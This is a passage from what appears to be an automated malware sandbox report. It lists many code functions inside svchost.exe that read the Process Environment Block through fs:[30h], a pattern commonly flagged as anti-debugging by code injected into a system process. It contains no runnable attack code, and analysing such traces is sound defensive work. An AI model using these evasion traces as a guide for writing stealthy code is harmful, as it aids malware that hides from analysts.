                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]4_2_02F3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]4_2_02F3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]4_2_02F3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]4_2_02F3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]4_2_02F3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]4_2_02F3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F383C0 mov eax, dword ptr fs:[00000030h]4_2_02F383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F383C0 mov eax, dword ptr fs:[00000030h]4_2_02F383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F383C0 mov eax, dword ptr fs:[00000030h]4_2_02F383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F383C0 mov eax, dword ptr fs:[00000030h]4_2_02F383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0300625D mov eax, dword ptr fs:[00000030h]4_2_0300625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F28397 mov eax, dword ptr fs:[00000030h]4_2_02F28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F28397 mov eax, dword ptr fs:[00000030h]4_2_02F28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F28397 mov eax, dword ptr fs:[00000030h]4_2_02F28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F2E388 mov eax, dword ptr fs:[00000030h]4_2_02F2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F2E388 mov eax, dword ptr fs:[00000030h]4_2_02F2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F2E388 mov eax, dword ptr fs:[00000030h]4_2_02F2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F5438F mov eax, dword ptr fs:[00000030h]4_2_02F5438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F5438F mov eax, dword ptr fs:[00000030h]4_2_02F5438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FD437C mov eax, dword ptr fs:[00000030h]4_2_02FD437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB035C mov eax, dword ptr fs:[00000030h]4_2_02FB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB035C mov eax, dword ptr fs:[00000030h]4_2_02FB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB035C mov eax, dword ptr fs:[00000030h]4_2_02FB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB035C mov ecx, dword ptr fs:[00000030h]4_2_02FB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB035C mov eax, dword ptr fs:[00000030h]4_2_02FB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB035C mov eax, dword ptr fs:[00000030h]4_2_02FB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FFA352 mov eax, dword ptr fs:[00000030h]4_2_02FFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FD8350 mov ecx, dword ptr fs:[00000030h]4_2_02FD8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB2349 mov eax, dword ptr fs:[00000030h]4_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB2349 mov eax, dword ptr fs:[00000030h]4_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB2349 mov eax, dword ptr fs:[00000030h]4_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB2349 mov eax, dword ptr fs:[00000030h]4_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB2349 mov eax, dword ptr fs:[00000030h]4_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB2349 mov eax, dword ptr fs:[00000030h]4_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB2349 mov eax, dword ptr fs:[00000030h]4_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB2349 mov eax, dword ptr fs:[00000030h]4_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB2349 mov eax, dword ptr fs:[00000030h]4_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB2349 mov eax, dword ptr fs:[00000030h]4_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB2349 mov eax, dword ptr fs:[00000030h]4_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB2349 mov eax, dword ptr fs:[00000030h]4_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB2349 mov eax, dword ptr fs:[00000030h]4_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB2349 mov eax, dword ptr fs:[00000030h]4_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB2349 mov eax, dword ptr fs:[00000030h]4_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030062D6 mov eax, dword ptr fs:[00000030h]4_2_030062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F2C310 mov ecx, dword ptr fs:[00000030h]4_2_02F2C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F50310 mov ecx, dword ptr fs:[00000030h]4_2_02F50310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6A30B mov eax, dword ptr fs:[00000030h]4_2_02F6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6A30B mov eax, dword ptr fs:[00000030h]4_2_02F6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6A30B mov eax, dword ptr fs:[00000030h]4_2_02F6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F2C0F0 mov eax, dword ptr fs:[00000030h]4_2_02F2C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F720F0 mov ecx, dword ptr fs:[00000030h]4_2_02F720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F2A0E3 mov ecx, dword ptr fs:[00000030h]4_2_02F2A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F380E9 mov eax, dword ptr fs:[00000030h]4_2_02F380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB60E0 mov eax, dword ptr fs:[00000030h]4_2_02FB60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB20DE mov eax, dword ptr fs:[00000030h]4_2_02FB20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FF60B8 mov eax, dword ptr fs:[00000030h]4_2_02FF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FF60B8 mov ecx, dword ptr fs:[00000030h]4_2_02FF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F280A0 mov eax, dword ptr fs:[00000030h]4_2_02F280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FC80A8 mov eax, dword ptr fs:[00000030h]4_2_02FC80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03004164 mov eax, dword ptr fs:[00000030h]4_2_03004164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03004164 mov eax, dword ptr fs:[00000030h]4_2_03004164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F3208A mov eax, dword ptr fs:[00000030h]4_2_02F3208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F5C073 mov eax, dword ptr fs:[00000030h]4_2_02F5C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F32050 mov eax, dword ptr fs:[00000030h]4_2_02F32050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB6050 mov eax, dword ptr fs:[00000030h]4_2_02FB6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FC6030 mov eax, dword ptr fs:[00000030h]4_2_02FC6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F2A020 mov eax, dword ptr fs:[00000030h]4_2_02F2A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F2C020 mov eax, dword ptr fs:[00000030h]4_2_02F2C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F4E016 mov eax, dword ptr fs:[00000030h]4_2_02F4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F4E016 mov eax, dword ptr fs:[00000030h]4_2_02F4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F4E016 mov eax, dword ptr fs:[00000030h]4_2_02F4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F4E016 mov eax, dword ptr fs:[00000030h]4_2_02F4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030061E5 mov eax, dword ptr fs:[00000030h]4_2_030061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB4000 mov ecx, dword ptr fs:[00000030h]4_2_02FB4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FD2000 mov eax, dword ptr fs:[00000030h]4_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FD2000 mov eax, dword ptr fs:[00000030h]4_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FD2000 mov eax, dword ptr fs:[00000030h]4_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FD2000 mov eax, dword ptr fs:[00000030h]4_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FD2000 mov eax, dword ptr fs:[00000030h]4_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FD2000 mov eax, dword ptr fs:[00000030h]4_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FD2000 mov eax, dword ptr fs:[00000030h]4_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FD2000 mov eax, dword ptr fs:[00000030h]4_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F601F8 mov eax, dword ptr fs:[00000030h]4_2_02F601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]4_2_02FAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]4_2_02FAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FAE1D0 mov ecx, dword ptr fs:[00000030h]4_2_02FAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]4_2_02FAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]4_2_02FAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FF61C3 mov eax, dword ptr fs:[00000030h]4_2_02FF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FF61C3 mov eax, dword ptr fs:[00000030h]4_2_02FF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB019F mov eax, dword ptr fs:[00000030h]4_2_02FB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB019F mov eax, dword ptr fs:[00000030h]4_2_02FB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB019F mov eax, dword ptr fs:[00000030h]4_2_02FB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB019F mov eax, dword ptr fs:[00000030h]4_2_02FB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F2A197 mov eax, dword ptr fs:[00000030h]4_2_02F2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F2A197 mov eax, dword ptr fs:[00000030h]4_2_02F2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F2A197 mov eax, dword ptr fs:[00000030h]4_2_02F2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F70185 mov eax, dword ptr fs:[00000030h]4_2_02F70185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FEC188 mov eax, dword ptr fs:[00000030h]4_2_02FEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FEC188 mov eax, dword ptr fs:[00000030h]4_2_02FEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FD4180 mov eax, dword ptr fs:[00000030h]4_2_02FD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FD4180 mov eax, dword ptr fs:[00000030h]4_2_02FD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F2C156 mov eax, dword ptr fs:[00000030h]4_2_02F2C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FC8158 mov eax, dword ptr fs:[00000030h]4_2_02FC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F36154 mov eax, dword ptr fs:[00000030h]4_2_02F36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F36154 mov eax, dword ptr fs:[00000030h]4_2_02F36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FC4144 mov eax, dword ptr fs:[00000030h]4_2_02FC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FC4144 mov eax, dword ptr fs:[00000030h]4_2_02FC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FC4144 mov ecx, dword ptr fs:[00000030h]4_2_02FC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FC4144 mov eax, dword ptr fs:[00000030h]4_2_02FC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FC4144 mov eax, dword ptr fs:[00000030h]4_2_02FC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F60124 mov eax, dword ptr fs:[00000030h]4_2_02F60124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FDA118 mov ecx, dword ptr fs:[00000030h]4_2_02FDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FDA118 mov eax, dword ptr fs:[00000030h]4_2_02FDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FDA118 mov eax, dword ptr fs:[00000030h]4_2_02FDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FDA118 mov eax, dword ptr fs:[00000030h]4_2_02FDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FF0115 mov eax, dword ptr fs:[00000030h]4_2_02FF0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FDE10E mov eax, dword ptr fs:[00000030h]4_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FDE10E mov ecx, dword ptr fs:[00000030h]4_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FDE10E mov eax, dword ptr fs:[00000030h]4_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FDE10E mov eax, dword ptr fs:[00000030h]4_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FDE10E mov ecx, dword ptr fs:[00000030h]4_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FDE10E mov eax, dword ptr fs:[00000030h]4_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FDE10E mov eax, dword ptr fs:[00000030h]4_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FDE10E mov ecx, dword ptr fs:[00000030h]4_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FDE10E mov eax, dword ptr fs:[00000030h]4_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FDE10E mov ecx, dword ptr fs:[00000030h]4_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]4_2_02FAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]4_2_02FAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]4_2_02FAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]4_2_02FAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB06F1 mov eax, dword ptr fs:[00000030h]4_2_02FB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB06F1 mov eax, dword ptr fs:[00000030h]4_2_02FB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6A6C7 mov ebx, dword ptr fs:[00000030h]4_2_02F6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6A6C7 mov eax, dword ptr fs:[00000030h]4_2_02F6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F666B0 mov eax, dword ptr fs:[00000030h]4_2_02F666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6C6A6 mov eax, dword ptr fs:[00000030h]4_2_02F6C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F34690 mov eax, dword ptr fs:[00000030h]4_2_02F34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F34690 mov eax, dword ptr fs:[00000030h]4_2_02F34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F62674 mov eax, dword ptr fs:[00000030h]4_2_02F62674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FF866E mov eax, dword ptr fs:[00000030h]4_2_02FF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FF866E mov eax, dword ptr fs:[00000030h]4_2_02FF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6A660 mov eax, dword ptr fs:[00000030h]4_2_02F6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6A660 mov eax, dword ptr fs:[00000030h]4_2_02F6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F4C640 mov eax, dword ptr fs:[00000030h]4_2_02F4C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F4E627 mov eax, dword ptr fs:[00000030h]4_2_02F4E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F66620 mov eax, dword ptr fs:[00000030h]4_2_02F66620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F68620 mov eax, dword ptr fs:[00000030h]4_2_02F68620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F3262C mov eax, dword ptr fs:[00000030h]4_2_02F3262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72619 mov eax, dword ptr fs:[00000030h]4_2_02F72619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FAE609 mov eax, dword ptr fs:[00000030h]4_2_02FAE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F4260B mov eax, dword ptr fs:[00000030h]4_2_02F4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F4260B mov eax, dword ptr fs:[00000030h]4_2_02F4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F4260B mov eax, dword ptr fs:[00000030h]4_2_02F4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F4260B mov eax, dword ptr fs:[00000030h]4_2_02F4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F4260B mov eax, dword ptr fs:[00000030h]4_2_02F4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F4260B mov eax, dword ptr fs:[00000030h]4_2_02F4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F4260B mov eax, dword ptr fs:[00000030h]4_2_02F4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F347FB mov eax, dword ptr fs:[00000030h]4_2_02F347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F347FB mov eax, dword ptr fs:[00000030h]4_2_02F347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F527ED mov eax, dword ptr fs:[00000030h]4_2_02F527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F527ED mov eax, dword ptr fs:[00000030h]4_2_02F527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F527ED mov eax, dword ptr fs:[00000030h]4_2_02F527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FBE7E1 mov eax, dword ptr fs:[00000030h]4_2_02FBE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F3C7C0 mov eax, dword ptr fs:[00000030h]4_2_02F3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB07C3 mov eax, dword ptr fs:[00000030h]4_2_02FB07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F307AF mov eax, dword ptr fs:[00000030h]4_2_02F307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FE47A0 mov eax, dword ptr fs:[00000030h]4_2_02FE47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FD678E mov eax, dword ptr fs:[00000030h]4_2_02FD678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F38770 mov eax, dword ptr fs:[00000030h]4_2_02F38770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F40770 mov eax, dword ptr fs:[00000030h]4_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F40770 mov eax, dword ptr fs:[00000030h]4_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F40770 mov eax, dword ptr fs:[00000030h]4_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F40770 mov eax, dword ptr fs:[00000030h]4_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F40770 mov eax, dword ptr fs:[00000030h]4_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F40770 mov eax, dword ptr fs:[00000030h]4_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F40770 mov eax, dword ptr fs:[00000030h]4_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F40770 mov eax, dword ptr fs:[00000030h]4_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F40770 mov eax, dword ptr fs:[00000030h]4_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F40770 mov eax, dword ptr fs:[00000030h]4_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F40770 mov eax, dword ptr fs:[00000030h]4_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F40770 mov eax, dword ptr fs:[00000030h]4_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F30750 mov eax, dword ptr fs:[00000030h]4_2_02F30750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FBE75D mov eax, dword ptr fs:[00000030h]4_2_02FBE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72750 mov eax, dword ptr fs:[00000030h]4_2_02F72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72750 mov eax, dword ptr fs:[00000030h]4_2_02F72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB4755 mov eax, dword ptr fs:[00000030h]4_2_02FB4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6674D mov esi, dword ptr fs:[00000030h]4_2_02F6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6674D mov eax, dword ptr fs:[00000030h]4_2_02F6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6674D mov eax, dword ptr fs:[00000030h]4_2_02F6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6273C mov eax, dword ptr fs:[00000030h]4_2_02F6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6273C mov ecx, dword ptr fs:[00000030h]4_2_02F6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6273C mov eax, dword ptr fs:[00000030h]4_2_02F6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FAC730 mov eax, dword ptr fs:[00000030h]4_2_02FAC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6C720 mov eax, dword ptr fs:[00000030h]4_2_02F6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6C720 mov eax, dword ptr fs:[00000030h]4_2_02F6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F30710 mov eax, dword ptr fs:[00000030h]4_2_02F30710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F60710 mov eax, dword ptr fs:[00000030h]4_2_02F60710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6C700 mov eax, dword ptr fs:[00000030h]4_2_02F6C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03004500 mov eax, dword ptr fs:[00000030h]4_2_03004500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03004500 mov eax, dword ptr fs:[00000030h]4_2_03004500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03004500 mov eax, dword ptr fs:[00000030h]4_2_03004500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03004500 mov eax, dword ptr fs:[00000030h]4_2_03004500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03004500 mov eax, dword ptr fs:[00000030h]4_2_03004500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03004500 mov eax, dword ptr fs:[00000030h]4_2_03004500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03004500 mov eax, dword ptr fs:[00000030h]4_2_03004500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F304E5 mov ecx, dword ptr fs:[00000030h]4_2_02F304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F644B0 mov ecx, dword ptr fs:[00000030h]4_2_02F644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FBA4B0 mov eax, dword ptr fs:[00000030h]4_2_02FBA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F364AB mov eax, dword ptr fs:[00000030h]4_2_02F364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FEA49A mov eax, dword ptr fs:[00000030h]4_2_02FEA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F5A470 mov eax, dword ptr fs:[00000030h]4_2_02F5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F5A470 mov eax, dword ptr fs:[00000030h]4_2_02F5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F5A470 mov eax, dword ptr fs:[00000030h]4_2_02F5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FBC460 mov ecx, dword ptr fs:[00000030h]4_2_02FBC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FEA456 mov eax, dword ptr fs:[00000030h]4_2_02FEA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F2645D mov eax, dword ptr fs:[00000030h]4_2_02F2645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F5245A mov eax, dword ptr fs:[00000030h]4_2_02F5245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6E443 mov eax, dword ptr fs:[00000030h]4_2_02F6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6E443 mov eax, dword ptr fs:[00000030h]4_2_02F6E443
